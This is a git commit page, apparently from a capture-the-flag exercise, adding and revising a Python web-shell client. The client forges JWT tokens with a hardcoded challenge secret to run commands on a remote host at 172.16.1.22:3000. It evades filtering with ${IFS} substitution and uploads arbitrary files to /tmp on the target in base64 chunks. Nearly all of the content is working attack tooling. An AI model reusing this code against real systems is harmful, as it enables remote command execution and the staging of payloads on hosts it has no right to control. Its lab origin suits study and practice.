Fixed issue with uploading file
This commit is contained in:
Isaac Parenteau
36
file_upload.py
Normal file
36
file_upload.py
Normal file
@ -0,0 +1,36 @@
|
|||||||
|
import base64
|
||||||
|
import os
|
||||||
|
import jwt
|
||||||
|
import requests
|
||||||
|
|
||||||
|
|
||||||
|
def send_cmd(cmd):
|
||||||
|
payload = {'cmd': cmd.replace(' ', '${IFS}')}
|
||||||
|
token = jwt.encode(payload, 'hope you enjoy this challenge -ippsec', algorithm='HS256')
|
||||||
|
headers = {'Authorization': 'Bearer {}'.format(token.decode())}
|
||||||
|
output = requests.get('http://172.16.1.22:3000', headers=headers)
|
||||||
|
return output.content
|
||||||
|
|
||||||
|
|
||||||
|
def send_file():
|
||||||
|
"""
|
||||||
|
|
||||||
|
:return:
|
||||||
|
"""
|
||||||
|
file = input("Please enter path to file: ")
|
||||||
|
file_name = os.path.basename(file)
|
||||||
|
|
||||||
|
print(f'Uploading File {file_name}')
|
||||||
|
with open(file, 'rb') as f:
|
||||||
|
send_cmd(f'cd /tmp && rm -f {file_name}') # clear the file if it exists
|
||||||
|
while True:
|
||||||
|
chunk = f.read(1024)
|
||||||
|
if not chunk:
|
||||||
|
break
|
||||||
|
send_cmd(f'cd /tmp && echo {base64.b64encode(chunk)} | base64 -d >> {file_name}')
|
||||||
|
|
||||||
|
print('Done Sending File')
|
||||||
|
|
||||||
|
|
||||||
|
if __name__ == '__main__':
|
||||||
|
send_file()
|
||||||
@ -47,7 +47,6 @@ class WebShell(object):
|
|||||||
:return:
|
:return:
|
||||||
"""
|
"""
|
||||||
get_output = f"/bin/cat {self.stdout}"
|
get_output = f"/bin/cat {self.stdout}"
|
||||||
get_output = get_output.replace(' ', '${IFS}')
|
|
||||||
while True:
|
while True:
|
||||||
result = self.run_raw_command(get_output)
|
result = self.run_raw_command(get_output)
|
||||||
if result:
|
if result:
|
||||||
@ -103,14 +102,16 @@ class WebShell(object):
|
|||||||
file = input("Please enter path to file: ")
|
file = input("Please enter path to file: ")
|
||||||
file_name = os.path.basename(file)
|
file_name = os.path.basename(file)
|
||||||
|
|
||||||
print(f'Uploading File {file_name}')
|
print(f'[*] Uploading File {file_name}')
|
||||||
|
self.write_command(f'rm -f /tmp/{file_name}') # clear the file if it exists
|
||||||
with open(file, 'rb') as f:
|
with open(file, 'rb') as f:
|
||||||
chunk = f.read(1024)
|
b64 = base64.b64encode(f.read()).decode()
|
||||||
self.write_command(f'cd /tmp && echo {base64.b64encode(chunk)} | base64 -d > {file_name}')
|
x = 8192
|
||||||
while chunk:
|
for i in range(0, len(b64), x):
|
||||||
self.write_command(f'cd /tmp && echo {base64.b64encode(chunk)} | base64 -d >> {file_name}')
|
chunk = b64[i:i+x]
|
||||||
|
self.write_command(f'echo {chunk} | base64 -d >> /tmp/{file_name}')
|
||||||
|
|
||||||
print('Done Sending File')
|
print(f'[*] Done Sending File to /tmp/{file_name}')
|
||||||
|
|
||||||
|
|
||||||
prompt = "Please Subscribe> "
|
prompt = "Please Subscribe> "
|
||||||
@ -122,5 +123,7 @@ while True:
|
|||||||
s.upgrade_shell()
|
s.upgrade_shell()
|
||||||
elif cmd == "upload":
|
elif cmd == "upload":
|
||||||
s.send_file()
|
s.send_file()
|
||||||
|
elif cmd in ["quit", "exit"]:
|
||||||
|
break
|
||||||
else:
|
else:
|
||||||
s.write_command(cmd)
|
s.write_command(cmd)
|
||||||
|
|||||||
Reference in New Issue
Block a user